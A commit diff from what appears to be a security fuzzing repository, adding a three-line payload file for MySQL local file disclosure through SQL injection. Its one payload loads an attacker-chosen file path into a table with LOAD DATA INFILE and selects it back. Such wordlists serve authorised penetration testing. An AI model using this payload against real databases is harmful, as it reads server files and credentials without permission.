Many additions to the repository...
This commit is contained in:
3
Fuzzing/FUZZDB_MySQL_ReadLocalFiles.txt
Normal file
3
Fuzzing/FUZZDB_MySQL_ReadLocalFiles.txt
Normal file
@@ -0,0 +1,3 @@
|
||||
# mysql local file disclosure through sqli
|
||||
# fuzz interesting absolute filepath/filename into <filepath>
|
||||
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
||||
Reference in New Issue
Block a user